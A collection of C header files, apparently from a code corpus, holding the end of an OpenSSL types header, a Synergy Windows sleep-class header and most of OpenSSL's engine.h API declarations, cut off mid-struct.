CRYPTO_EX_free(void *parent, void *ptr, CRYPTO_EX_DATA *ad, int idx, long argl, void *argp); typedef int CRYPTO_EX_dup(CRYPTO_EX_DATA *to, CRYPTO_EX_DATA *from, void *from_d, int idx, long argl, void *argp); typedef struct ocsp_req_ctx_st OCSP_REQ_CTX; typedef struct ocsp_response_st OCSP_RESPONSE; typedef struct ocsp_responder_id_st OCSP_RESPID; #endif /* def HEADER_OPENSSL_TYPES_H */
{ "language": "C" }
/* * synergy -- mouse and keyboard sharing utility * Copyright (C) 2012-2016 Symless Ltd. * Copyright (C) 2002 Chris Schoeneman * * This package is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * found in the file LICENSE that should have accompanied this file. * * This package is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. */ #pragma once #include "arch/IArchSleep.h" #define ARCH_SLEEP ArchSleepWindows //! Win32 implementation of IArchSleep class ArchSleepWindows : public IArchSleep { public: ArchSleepWindows(); virtual ~ArchSleepWindows(); // IArchSleep overrides virtual void sleep(double timeout); };
{ "language": "C" }
/* openssl/engine.h */ /* * Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL project * 2000. */ /* ==================================================================== * Copyright (c) 1999-2004 The OpenSSL Project. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * * 3. All advertising materials mentioning features or use of this * software must display the following acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)" * * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to * endorse or promote products derived from this software without * prior written permission. For written permission, please contact * licensing@OpenSSL.org. * * 5. Products derived from this software may not be called "OpenSSL" * nor may "OpenSSL" appear in their names without prior written * permission of the OpenSSL Project. * * 6. Redistributions of any form whatsoever must retain the following * acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)" * * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OpenSSL PROJECT OR * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE. * ==================================================================== * * This product includes cryptographic software written by Eric Young * (eay@cryptsoft.com). This product includes software written by Tim * Hudson (tjh@cryptsoft.com). * */ /* ==================================================================== * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED. * ECDH support in OpenSSL originally developed by * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project. */ #ifndef HEADER_ENGINE_H # define HEADER_ENGINE_H # include <openssl/opensslconf.h> # ifdef OPENSSL_NO_ENGINE # error ENGINE is disabled. # endif # ifndef OPENSSL_NO_DEPRECATED # include <openssl/bn.h> # ifndef OPENSSL_NO_RSA # include <openssl/rsa.h> # endif # ifndef OPENSSL_NO_DSA # include <openssl/dsa.h> # endif # ifndef OPENSSL_NO_DH # include <openssl/dh.h> # endif # ifndef OPENSSL_NO_ECDH # include <openssl/ecdh.h> # endif # ifndef OPENSSL_NO_ECDSA # include <openssl/ecdsa.h> # endif # include <openssl/rand.h> # include <openssl/ui.h> # include <openssl/err.h> # endif # include <openssl/ossl_typ.h> # include <openssl/symhacks.h> # include <openssl/x509.h> #ifdef __cplusplus extern "C" { #endif /* * These flags are used to control combinations of algorithm (methods) by * bitwise "OR"ing. */ # define ENGINE_METHOD_RSA (unsigned int)0x0001 # define ENGINE_METHOD_DSA (unsigned int)0x0002 # define ENGINE_METHOD_DH (unsigned int)0x0004 # define ENGINE_METHOD_RAND (unsigned int)0x0008 # define ENGINE_METHOD_ECDH (unsigned int)0x0010 # define ENGINE_METHOD_ECDSA (unsigned int)0x0020 # define ENGINE_METHOD_CIPHERS (unsigned int)0x0040 # define ENGINE_METHOD_DIGESTS (unsigned int)0x0080 # define ENGINE_METHOD_STORE (unsigned int)0x0100 # define ENGINE_METHOD_PKEY_METHS (unsigned int)0x0200 # define ENGINE_METHOD_PKEY_ASN1_METHS (unsigned int)0x0400 /* Obvious all-or-nothing cases. */ # define ENGINE_METHOD_ALL (unsigned int)0xFFFF # define ENGINE_METHOD_NONE (unsigned int)0x0000 /* * This(ese) flag(s) controls behaviour of the ENGINE_TABLE mechanism used * internally to control registration of ENGINE implementations, and can be * set by ENGINE_set_table_flags(). The "NOINIT" flag prevents attempts to * initialise registered ENGINEs if they are not already initialised. */ # define ENGINE_TABLE_FLAG_NOINIT (unsigned int)0x0001 /* ENGINE flags that can be set by ENGINE_set_flags(). */ /* Not used */ /* #define ENGINE_FLAGS_MALLOCED 0x0001 */ /* * This flag is for ENGINEs that wish to handle the various 'CMD'-related * control commands on their own. Without this flag, ENGINE_ctrl() handles * these control commands on behalf of the ENGINE using their "cmd_defns" * data. */ # define ENGINE_FLAGS_MANUAL_CMD_CTRL (int)0x0002 /* * This flag is for ENGINEs who return new duplicate structures when found * via "ENGINE_by_id()". When an ENGINE must store state (eg. if * ENGINE_ctrl() commands are called in sequence as part of some stateful * process like key-generation setup and execution), it can set this flag - * then each attempt to obtain the ENGINE will result in it being copied into * a new structure. Normally, ENGINEs don't declare this flag so * ENGINE_by_id() just increments the existing ENGINE's structural reference * count. */ # define ENGINE_FLAGS_BY_ID_COPY (int)0x0004 /* * This flag if for an ENGINE that does not want its methods registered as * part of ENGINE_register_all_complete() for example if the methods are not * usable as default methods. */ # define ENGINE_FLAGS_NO_REGISTER_ALL (int)0x0008 /* * ENGINEs can support their own command types, and these flags are used in * ENGINE_CTRL_GET_CMD_FLAGS to indicate to the caller what kind of input * each command expects. Currently only numeric and string input is * supported. If a control command supports none of the _NUMERIC, _STRING, or * _NO_INPUT options, then it is regarded as an "internal" control command - * and not for use in config setting situations. As such, they're not * available to the ENGINE_ctrl_cmd_string() function, only raw ENGINE_ctrl() * access. Changes to this list of 'command types' should be reflected * carefully in ENGINE_cmd_is_executable() and ENGINE_ctrl_cmd_string(). */ /* accepts a 'long' input value (3rd parameter to ENGINE_ctrl) */ # define ENGINE_CMD_FLAG_NUMERIC (unsigned int)0x0001 /* * accepts string input (cast from 'void*' to 'const char *', 4th parameter * to ENGINE_ctrl) */ # define ENGINE_CMD_FLAG_STRING (unsigned int)0x0002 /* * Indicates that the control command takes *no* input. Ie. the control * command is unparameterised. */ # define ENGINE_CMD_FLAG_NO_INPUT (unsigned int)0x0004 /* * Indicates that the control command is internal. This control command won't * be shown in any output, and is only usable through the ENGINE_ctrl_cmd() * function. */ # define ENGINE_CMD_FLAG_INTERNAL (unsigned int)0x0008 /* * NB: These 3 control commands are deprecated and should not be used. * ENGINEs relying on these commands should compile conditional support for * compatibility (eg. if these symbols are defined) but should also migrate * the same functionality to their own ENGINE-specific control functions that * can be "discovered" by calling applications. The fact these control * commands wouldn't be "executable" (ie. usable by text-based config) * doesn't change the fact that application code can find and use them * without requiring per-ENGINE hacking. */ /* * These flags are used to tell the ctrl function what should be done. All * command numbers are shared between all engines, even if some don't make * sense to some engines. In such a case, they do nothing but return the * error ENGINE_R_CTRL_COMMAND_NOT_IMPLEMENTED. */ # define ENGINE_CTRL_SET_LOGSTREAM 1 # define ENGINE_CTRL_SET_PASSWORD_CALLBACK 2 # define ENGINE_CTRL_HUP 3/* Close and reinitialise * any handles/connections * etc. */ # define ENGINE_CTRL_SET_USER_INTERFACE 4/* Alternative to callback */ # define ENGINE_CTRL_SET_CALLBACK_DATA 5/* User-specific data, used * when calling the password * callback and the user * interface */ # define ENGINE_CTRL_LOAD_CONFIGURATION 6/* Load a configuration, * given a string that * represents a file name * or so */ # define ENGINE_CTRL_LOAD_SECTION 7/* Load data from a given * section in the already * loaded configuration */ /* * These control commands allow an application to deal with an arbitrary * engine in a dynamic way. Warn: Negative return values indicate errors FOR * THESE COMMANDS because zero is used to indicate 'end-of-list'. Other * commands, including ENGINE-specific command types, return zero for an * error. An ENGINE can choose to implement these ctrl functions, and can * internally manage things however it chooses - it does so by setting the * ENGINE_FLAGS_MANUAL_CMD_CTRL flag (using ENGINE_set_flags()). Otherwise * the ENGINE_ctrl() code handles this on the ENGINE's behalf using the * cmd_defns data (set using ENGINE_set_cmd_defns()). This means an ENGINE's * ctrl() handler need only implement its own commands - the above "meta" * commands will be taken care of. */ /* * Returns non-zero if the supplied ENGINE has a ctrl() handler. If "not", * then all the remaining control commands will return failure, so it is * worth checking this first if the caller is trying to "discover" the * engine's capabilities and doesn't want errors generated unnecessarily. */ # define ENGINE_CTRL_HAS_CTRL_FUNCTION 10 /* * Returns a positive command number for the first command supported by the * engine. Returns zero if no ctrl commands are supported. */ # define ENGINE_CTRL_GET_FIRST_CMD_TYPE 11 /* * The 'long' argument specifies a command implemented by the engine, and the * return value is the next command supported, or zero if there are no more. */ # define ENGINE_CTRL_GET_NEXT_CMD_TYPE 12 /* * The 'void*' argument is a command name (cast from 'const char *'), and the * return value is the command that corresponds to it. */ # define ENGINE_CTRL_GET_CMD_FROM_NAME 13 /* * The next two allow a command to be converted into its corresponding string * form. In each case, the 'long' argument supplies the command. In the * NAME_LEN case, the return value is the length of the command name (not * counting a trailing EOL). In the NAME case, the 'void*' argument must be a * string buffer large enough, and it will be populated with the name of the * command (WITH a trailing EOL). */ # define ENGINE_CTRL_GET_NAME_LEN_FROM_CMD 14 # define ENGINE_CTRL_GET_NAME_FROM_CMD 15 /* The next two are similar but give a "short description" of a command. */ # define ENGINE_CTRL_GET_DESC_LEN_FROM_CMD 16 # define ENGINE_CTRL_GET_DESC_FROM_CMD 17 /* * With this command, the return value is the OR'd combination of * ENGINE_CMD_FLAG_*** values that indicate what kind of input a given * engine-specific ctrl command expects. */ # define ENGINE_CTRL_GET_CMD_FLAGS 18 /* * ENGINE implementations should start the numbering of their own control * commands from this value. (ie. ENGINE_CMD_BASE, ENGINE_CMD_BASE + 1, etc). */ # define ENGINE_CMD_BASE 200 /* * NB: These 2 nCipher "chil" control commands are deprecated, and their * functionality is now available through ENGINE-specific control commands * (exposed through the above-mentioned 'CMD'-handling). Code using these 2 * commands should be migrated to the more general command handling before * these are removed. */ /* Flags specific to the nCipher "chil" engine */ # define ENGINE_CTRL_CHIL_SET_FORKCHECK 100 /* * Depending on the value of the (long)i argument, this sets or * unsets the SimpleForkCheck flag in the CHIL API to enable or * disable checking and workarounds for applications that fork(). */ # define ENGINE_CTRL_CHIL_NO_LOCKING 101 /* * This prevents the initialisation function from providing mutex * callbacks to the nCipher library. */ /* * If an ENGINE supports its own specific control commands and wishes the * framework to handle the above 'ENGINE_CMD_***'-manipulation commands on * its behalf, it should supply a null-terminated array of ENGINE_CMD_DEFN * entries to ENGINE_set_cmd_defns(). It should also implement a ctrl() * handler that supports the stated commands (ie. the "cmd_num" entries as * described by the array). NB: The array must be ordered in increasing order * of cmd_num. "null-terminated" means that the last ENGINE_CMD_DEFN element * has cmd_num set to zero and/or cmd_name set to NULL. */ typedef struct ENGINE_CMD_DEFN_st { unsigned int cmd_num; /* The command number */ const char *cmd_name; /* The command name itself */ const char *cmd_desc; /* A short description of the command */ unsigned int cmd_flags; /* The input the command expects */ } ENGINE_CMD_DEFN; /* Generic function pointer */ typedef int (*ENGINE_GEN_FUNC_PTR) (void); /* Generic function pointer taking no arguments */ typedef int (*ENGINE_GEN_INT_FUNC_PTR) (ENGINE *); /* Specific control function pointer */ typedef int (*ENGINE_CTRL_FUNC_PTR) (ENGINE *, int, long, void *, void (*f) (void)); /* Generic load_key function pointer */ typedef EVP_PKEY *(*ENGINE_LOAD_KEY_PTR)(ENGINE *, const char *, UI_METHOD *ui_method, void *callback_data); typedef int (*ENGINE_SSL_CLIENT_CERT_PTR) (ENGINE *, SSL *ssl, STACK_OF(X509_NAME) *ca_dn, X509 **pcert, EVP_PKEY **pkey, STACK_OF(X509) **pother, UI_METHOD *ui_method, void *callback_data); /*- * These callback types are for an ENGINE's handler for cipher and digest logic. * These handlers have these prototypes; * int foo(ENGINE *e, const EVP_CIPHER **cipher, const int **nids, int nid); * int foo(ENGINE *e, const EVP_MD **digest, const int **nids, int nid); * Looking at how to implement these handlers in the case of cipher support, if * the framework wants the EVP_CIPHER for 'nid', it will call; * foo(e, &p_evp_cipher, NULL, nid); (return zero for failure) * If the framework wants a list of supported 'nid's, it will call; * foo(e, NULL, &p_nids, 0); (returns number of 'nids' or -1 for error) */ /* * Returns to a pointer to the array of supported cipher 'nid's. If the * second parameter is non-NULL it is set to the size of the returned array. */ typedef int (*ENGINE_CIPHERS_PTR) (ENGINE *, const EVP_CIPHER **, const int **, int); typedef int (*ENGINE_DIGESTS_PTR) (ENGINE *, const EVP_MD **, const int **, int); typedef int (*ENGINE_PKEY_METHS_PTR) (ENGINE *, EVP_PKEY_METHOD **, const int **, int); typedef int (*ENGINE_PKEY_ASN1_METHS_PTR) (ENGINE *, EVP_PKEY_ASN1_METHOD **, const int **, int); /* * STRUCTURE functions ... all of these functions deal with pointers to * ENGINE structures where the pointers have a "structural reference". This * means that their reference is to allowed access to the structure but it * does not imply that the structure is functional. To simply increment or * decrement the structural reference count, use ENGINE_by_id and * ENGINE_free. NB: This is not required when iterating using ENGINE_get_next * as it will automatically decrement the structural reference count of the * "current" ENGINE and increment the structural reference count of the * ENGINE it returns (unless it is NULL). */ /* Get the first/last "ENGINE" type available. */ ENGINE *ENGINE_get_first(void); ENGINE *ENGINE_get_last(void); /* Iterate to the next/previous "ENGINE" type (NULL = end of the list). */ ENGINE *ENGINE_get_next(ENGINE *e); ENGINE *ENGINE_get_prev(ENGINE *e); /* Add another "ENGINE" type into the array. */ int ENGINE_add(ENGINE *e); /* Remove an existing "ENGINE" type from the array. */ int ENGINE_remove(ENGINE *e); /* Retrieve an engine from the list by its unique "id" value. */ ENGINE *ENGINE_by_id(const char *id); /* Add all the built-in engines. */ void ENGINE_load_openssl(void); void ENGINE_load_dynamic(void); # ifndef OPENSSL_NO_STATIC_ENGINE void ENGINE_load_4758cca(void); void ENGINE_load_aep(void); void ENGINE_load_atalla(void); void ENGINE_load_chil(void); void ENGINE_load_cswift(void); void ENGINE_load_nuron(void); void ENGINE_load_sureware(void); void ENGINE_load_ubsec(void); void ENGINE_load_padlock(void); void ENGINE_load_capi(void); # ifndef OPENSSL_NO_GMP void ENGINE_load_gmp(void); # endif # ifndef OPENSSL_NO_GOST void ENGINE_load_gost(void); # endif # endif void ENGINE_load_cryptodev(void); void ENGINE_load_rdrand(void); void ENGINE_load_builtin_engines(void); /* * Get and set global flags (ENGINE_TABLE_FLAG_***) for the implementation * "registry" handling. */ unsigned int ENGINE_get_table_flags(void); void ENGINE_set_table_flags(unsigned int flags); /*- Manage registration of ENGINEs per "table". For each type, there are 3 * functions; * ENGINE_register_***(e) - registers the implementation from 'e' (if it has one) * ENGINE_unregister_***(e) - unregister the implementation from 'e' * ENGINE_register_all_***() - call ENGINE_register_***() for each 'e' in the list * Cleanup is automatically registered from each table when required, so * ENGINE_cleanup() will reverse any "register" operations. */ int ENGINE_register_RSA(ENGINE *e); void ENGINE_unregister_RSA(ENGINE *e); void ENGINE_register_all_RSA(void); int ENGINE_register_DSA(ENGINE *e); void ENGINE_unregister_DSA(ENGINE *e); void ENGINE_register_all_DSA(void); int ENGINE_register_ECDH(ENGINE *e); void ENGINE_unregister_ECDH(ENGINE *e); void ENGINE_register_all_ECDH(void); int ENGINE_register_ECDSA(ENGINE *e); void ENGINE_unregister_ECDSA(ENGINE *e); void ENGINE_register_all_ECDSA(void); int ENGINE_register_DH(ENGINE *e); void ENGINE_unregister_DH(ENGINE *e); void ENGINE_register_all_DH(void); int ENGINE_register_RAND(ENGINE *e); void ENGINE_unregister_RAND(ENGINE *e); void ENGINE_register_all_RAND(void); int ENGINE_register_STORE(ENGINE *e); void ENGINE_unregister_STORE(ENGINE *e); void ENGINE_register_all_STORE(void); int ENGINE_register_ciphers(ENGINE *e); void ENGINE_unregister_ciphers(ENGINE *e); void ENGINE_register_all_ciphers(void); int ENGINE_register_digests(ENGINE *e); void ENGINE_unregister_digests(ENGINE *e); void ENGINE_register_all_digests(void); int ENGINE_register_pkey_meths(ENGINE *e); void ENGINE_unregister_pkey_meths(ENGINE *e); void ENGINE_register_all_pkey_meths(void); int ENGINE_register_pkey_asn1_meths(ENGINE *e); void ENGINE_unregister_pkey_asn1_meths(ENGINE *e); void ENGINE_register_all_pkey_asn1_meths(void); /* * These functions register all support from the above categories. Note, use * of these functions can result in static linkage of code your application * may not need. If you only need a subset of functionality, consider using * more selective initialisation. */ int ENGINE_register_complete(ENGINE *e); int ENGINE_register_all_complete(void); /* * Send parametrised control commands to the engine. The possibilities to * send down an integer, a pointer to data or a function pointer are * provided. Any of the parameters may or may not be NULL, depending on the * command number. In actuality, this function only requires a structural * (rather than functional) reference to an engine, but many control commands * may require the engine be functional. The caller should be aware of trying * commands that require an operational ENGINE, and only use functional * references in such situations. */ int ENGINE_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) (void)); /* * This function tests if an ENGINE-specific command is usable as a * "setting". Eg. in an application's config file that gets processed through * ENGINE_ctrl_cmd_string(). If this returns zero, it is not available to * ENGINE_ctrl_cmd_string(), only ENGINE_ctrl(). */ int ENGINE_cmd_is_executable(ENGINE *e, int cmd); /* * This function works like ENGINE_ctrl() with the exception of taking a * command name instead of a command number, and can handle optional * commands. See the comment on ENGINE_ctrl_cmd_string() for an explanation * on how to use the cmd_name and cmd_optional. */ int ENGINE_ctrl_cmd(ENGINE *e, const char *cmd_name, long i, void *p, void (*f) (void), int cmd_optional); /* * This function passes a command-name and argument to an ENGINE. The * cmd_name is converted to a command number and the control command is * called using 'arg' as an argument (unless the ENGINE doesn't support such * a command, in which case no control command is called). The command is * checked for input flags, and if necessary the argument will be converted * to a numeric value. If cmd_optional is non-zero, then if the ENGINE * doesn't support the given cmd_name the return value will be success * anyway. This function is intended for applications to use so that users * (or config files) can supply engine-specific config data to the ENGINE at * run-time to control behaviour of specific engines. As such, it shouldn't * be used for calling ENGINE_ctrl() functions that return data, deal with * binary data, or that are otherwise supposed to be used directly through * ENGINE_ctrl() in application code. Any "return" data from an ENGINE_ctrl() * operation in this function will be lost - the return value is interpreted * as failure if the return value is zero, success otherwise, and this * function returns a boolean value as a result. In other words, vendors of * 'ENGINE'-enabled devices should write ENGINE implementations with * parameterisations that work in this scheme, so that compliant ENGINE-based * applications can work consistently with the same configuration for the * same ENGINE-enabled devices, across applications. */ int ENGINE_ctrl_cmd_string(ENGINE *e, const char *cmd_name, const char *arg, int cmd_optional); /* * These functions are useful for manufacturing new ENGINE structures. They * don't address reference counting at all - one uses them to populate an * ENGINE structure with personalised implementations of things prior to * using it directly or adding it to the builtin ENGINE list in OpenSSL. * These are also here so that the ENGINE structure doesn't have to be * exposed and break binary compatibility! */ ENGINE *ENGINE_new(void); int ENGINE_free(ENGINE *e); int ENGINE_up_ref(ENGINE *e); int ENGINE_set_id(ENGINE *e, const char *id); int ENGINE_set_name(ENGINE *e, const char *name); int ENGINE_set_RSA(ENGINE *e, const RSA_METHOD *rsa_meth); int ENGINE_set_DSA(ENGINE *e, const DSA_METHOD *dsa_meth); int ENGINE_set_ECDH(ENGINE *e, const ECDH_METHOD *ecdh_meth); int ENGINE_set_ECDSA(ENGINE *e, const ECDSA_METHOD *ecdsa_meth); int ENGINE_set_DH(ENGINE *e, const DH_METHOD *dh_meth); int ENGINE_set_RAND(ENGINE *e, const RAND_METHOD *rand_meth); int ENGINE_set_STORE(ENGINE *e, const STORE_METHOD *store_meth); int ENGINE_set_destroy_function(ENGINE *e, ENGINE_GEN_INT_FUNC_PTR destroy_f); int ENGINE_set_init_function(ENGINE *e, ENGINE_GEN_INT_FUNC_PTR init_f); int ENGINE_set_finish_function(ENGINE *e, ENGINE_GEN_INT_FUNC_PTR finish_f); int ENGINE_set_ctrl_function(ENGINE *e, ENGINE_CTRL_FUNC_PTR ctrl_f); int ENGINE_set_load_privkey_function(ENGINE *e, ENGINE_LOAD_KEY_PTR loadpriv_f); int ENGINE_set_load_pubkey_function(ENGINE *e, ENGINE_LOAD_KEY_PTR loadpub_f); int ENGINE_set_load_ssl_client_cert_function(ENGINE *e, ENGINE_SSL_CLIENT_CERT_PTR loadssl_f); int ENGINE_set_ciphers(ENGINE *e, ENGINE_CIPHERS_PTR f); int ENGINE_set_digests(ENGINE *e, ENGINE_DIGESTS_PTR f); int ENGINE_set_pkey_meths(ENGINE *e, ENGINE_PKEY_METHS_PTR f); int ENGINE_set_pkey_asn1_meths(ENGINE *e, ENGINE_PKEY_ASN1_METHS_PTR f); int ENGINE_set_flags(ENGINE *e, int flags); int ENGINE_set_cmd_defns(ENGINE *e, const ENGINE_CMD_DEFN *defns); /* These functions allow control over any per-structure ENGINE data. */ int ENGINE_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func, CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func); int ENGINE_set_ex_data(ENGINE *e, int idx, void *arg); void *ENGINE_get_ex_data(const ENGINE *e, int idx); /* * This function cleans up anything that needs it. Eg. the ENGINE_add() * function automatically ensures the list cleanup function is registered to * be called from ENGINE_cleanup(). Similarly, all ENGINE_register_*** * functions ensure ENGINE_cleanup() will clean up after them. */ void ENGINE_cleanup(void); /* * These return values from within the ENGINE structure. These can be useful * with functional references as well as structural references - it depends * which you obtained. Using the result for functional purposes if you only * obtained a structural reference may be problematic! */ const char *ENGINE_get_id(const ENGINE *e); const char *ENGINE_get_name(const ENGINE *e); const RSA_METHOD *ENGINE_get_RSA(const ENGINE *e); const DSA_METHOD *ENGINE_get_DSA(const ENGINE *e); const ECDH_METHOD *ENGINE_get_ECDH(const ENGINE *e); const ECDSA_METHOD *ENGINE_get_ECDSA(const ENGINE *e); const DH_METHOD *ENGINE_get_DH(const ENGINE *e); const RAND_METHOD *ENGINE_get_RAND(const ENGINE *e); const STORE_METHOD *ENGINE_get_STORE(const ENGINE *e); ENGINE_GEN_INT_FUNC_PTR ENGINE_get_destroy_function(const ENGINE *e); ENGINE_GEN_INT_FUNC_PTR ENGINE_get_init_function(const ENGINE *e); ENGINE_GEN_INT_FUNC_PTR ENGINE_get_finish_function(const ENGINE *e); ENGINE_CTRL_FUNC_PTR ENGINE_get_ctrl_function(const ENGINE *e); ENGINE_LOAD_KEY_PTR ENGINE_get_load_privkey_function(const ENGINE *e); ENGINE_LOAD_KEY_PTR ENGINE_get_load_pubkey_function(const ENGINE *e); ENGINE_SSL_CLIENT_CERT_PTR ENGINE_get_ssl_client_cert_function(const ENGINE *e); ENGINE_CIPHERS_PTR ENGINE_get_ciphers(const ENGINE *e); ENGINE_DIGESTS_PTR ENGINE_get_digests(const ENGINE *e); ENGINE_PKEY_METHS_PTR ENGINE_get_pkey_meths(const ENGINE *e); ENGINE_PKEY_ASN1_METHS_PTR ENGINE_get_pkey_asn1_meths(const ENGINE *e); const EVP_CIPHER *ENGINE_get_cipher(ENGINE *e, int nid); const EVP_MD *ENGINE_get_digest(ENGINE *e, int nid); const EVP_PKEY_METHOD *ENGINE_get_pkey_meth(ENGINE *e, int nid); const EVP_PKEY_ASN1_METHOD *ENGINE_get_pkey_asn1_meth(ENGINE *e, int nid); const EVP_PKEY_ASN1_METHOD *ENGINE_get_pkey_asn1_meth_str(ENGINE *e, const char *str, int len); const EVP_PKEY_ASN1_METHOD *ENGINE_pkey_asn1_find_str(ENGINE **pe, const char *str, int len); const ENGINE_CMD_DEFN *ENGINE_get_cmd_defns(const ENGINE *e); int ENGINE_get_flags(const ENGINE *e); /* * FUNCTIONAL functions. These functions deal with ENGINE structures that * have (or will) be initialised for use. Broadly speaking, the structural * functions are useful for iterating the list of available engine types, * creating new engine types, and other "list" operations. These functions * actually deal with ENGINEs that are to be used. As such these functions * can fail (if applicable) when particular engines are unavailable - eg. if * a hardware accelerator is not attached or not functioning correctly. Each * ENGINE has 2 reference counts; structural and functional. Every time a * functional reference is obtained or released, a corresponding structural * reference is automatically obtained or released too. */ /* * Initialise a engine type for use (or up its reference count if it's * already in use). This will fail if the engine is not currently operational * and cannot initialise. */ int ENGINE_init(ENGINE *e); /* * Free a functional reference to a engine type. This does not require a * corresponding call to ENGINE_free as it also releases a structural * reference. */ int ENGINE_finish(ENGINE *e); /* * The following functions handle keys that are stored in some secondary * location, handled by the engine. The storage may be on a card or * whatever. */ EVP_PKEY *ENGINE_load_private_key(ENGINE *e, const char *key_id, UI_METHOD *ui_method, void *callback_data); EVP_PKEY *ENGINE_load_public_key(ENGINE *e, const char *key_id, UI_METHOD *ui_method, void *callback_data); int ENGINE_load_ssl_client_cert(ENGINE *e, SSL *s, STACK_OF(X509_NAME) *ca_dn, X509 **pcert, EVP_PKEY **ppkey, STACK_OF(X509) **pother, UI_METHOD *ui_method, void *callback_data); /* * This returns a pointer for the current ENGINE structure that is (by * default) performing any RSA operations. The value returned is an * incremented reference, so it should be free'd (ENGINE_finish) before it is * discarded. */ ENGINE *ENGINE_get_default_RSA(void); /* Same for the other "methods" */ ENGINE *ENGINE_get_default_DSA(void); ENGINE *ENGINE_get_default_ECDH(void); ENGINE *ENGINE_get_default_ECDSA(void); ENGINE *ENGINE_get_default_DH(void); ENGINE *ENGINE_get_default_RAND(void); /* * These functions can be used to get a functional reference to perform * ciphering or digesting corresponding to "nid". */ ENGINE *ENGINE_get_cipher_engine(int nid); ENGINE *ENGINE_get_digest_engine(int nid); ENGINE *ENGINE_get_pkey_meth_engine(int nid); ENGINE *ENGINE_get_pkey_asn1_meth_engine(int nid); /* * This sets a new default ENGINE structure for performing RSA operations. If * the result is non-zero (success) then the ENGINE structure will have had * its reference count up'd so the caller should still free their own * reference 'e'. */ int ENGINE_set_default_RSA(ENGINE *e); int ENGINE_set_default_string(ENGINE *e, const char *def_list); /* Same for the other "methods" */ int ENGINE_set_default_DSA(ENGINE *e); int ENGINE_set_default_ECDH(ENGINE *e); int ENGINE_set_default_ECDSA(ENGINE *e); int ENGINE_set_default_DH(ENGINE *e); int ENGINE_set_default_RAND(ENGINE *e); int ENGINE_set_default_ciphers(ENGINE *e); int ENGINE_set_default_digests(ENGINE *e); int ENGINE_set_default_pkey_meths(ENGINE *e); int ENGINE_set_default_pkey_asn1_meths(ENGINE *e); /* * The combination "set" - the flags are bitwise "OR"d from the * ENGINE_METHOD_*** defines above. As with the "ENGINE_register_complete()" * function, this function can result in unnecessary static linkage. If your * application requires only specific functionality, consider using more * selective functions. */ int ENGINE_set_default(ENGINE *e, unsigned int flags); void ENGINE_add_conf_module(void); /* Deprecated functions ... */ /* int ENGINE_clear_defaults(void); */ /**************************/ /* DYNAMIC ENGINE SUPPORT */ /**************************/ /* Binary/behaviour compatibility levels */ # define OSSL_DYNAMIC_VERSION (unsigned long)0x00020000 /* * Binary versions older than this are too old for us (whether we're a loader * or a loadee) */ # define OSSL_DYNAMIC_OLDEST (unsigned long)0x00020000 /* * When compiling an ENGINE entirely as an external shared library, loadable * by the "dynamic" ENGINE, these types are needed. The 'dynamic_fns' * structure type provides the calling application's (or library's) error * functionality and memory management function pointers to the loaded * library. These should be used/set in the loaded library code so that the * loading application's 'state' will be used/changed in all operations. The * 'static_state' pointer allows the loaded library to know if it shares the * same static data as the calling application (or library), and thus whether * these callbacks need to be set or not. */ typedef void *(*dyn_MEM_malloc_cb) (size_t); typedef void *(*dyn_MEM_realloc_cb) (void *, size_t); typedef void (*dyn_MEM_free_cb) (void *); typedef struct st_dynamic_MEM_fns { dyn_MEM_malloc_cb malloc_cb; dyn_MEM_realloc_cb realloc_cb; dyn_MEM_free_cb free_cb; } dynamic_MEM_fns; /* * FIXME: Perhaps the memory and locking code (crypto.h) should declare and * use these types so we (and any other dependant code) can simplify a bit?? */ typedef void (*dyn_lock_locking_cb) (int, int, const char *, int); typedef int (*dyn_lock_add_lock_cb) (int *, int, int, const char *, int); typedef struct CRYPTO_dynlock_value *(*dyn_dynlock_create_cb) (const char *, int); typedef void (*dyn_dynlock_lock_cb) (int, struct CRYPTO_dynlock_value *, const char *, int); typedef void (*dyn_dynlock_destroy_cb) (struct CRYPTO_dynlock_value *, const char *, int); typedef struct st_dynamic_LOCK_fns { dyn_lock_locking_cb lock_locking_cb; dyn_lock_add_lock_cb lock_add_lock_cb; dyn_dynlock_create_cb dynlock_create_cb; dyn_dynlock_lock_cb dynlock_lock_cb; dyn_dynlock_destroy_cb dynlock_destroy_cb; } dynamic_LOCK_fns; /* The top-level structure */ typedef struct st_dynamic_fns { void *static_state; const ERR_FNS *err_fns; const CRYPTO_EX_DATA_IMPL *ex_data_fns; dynamic_MEM_fns mem_fns; dynamic_LOCK_fns 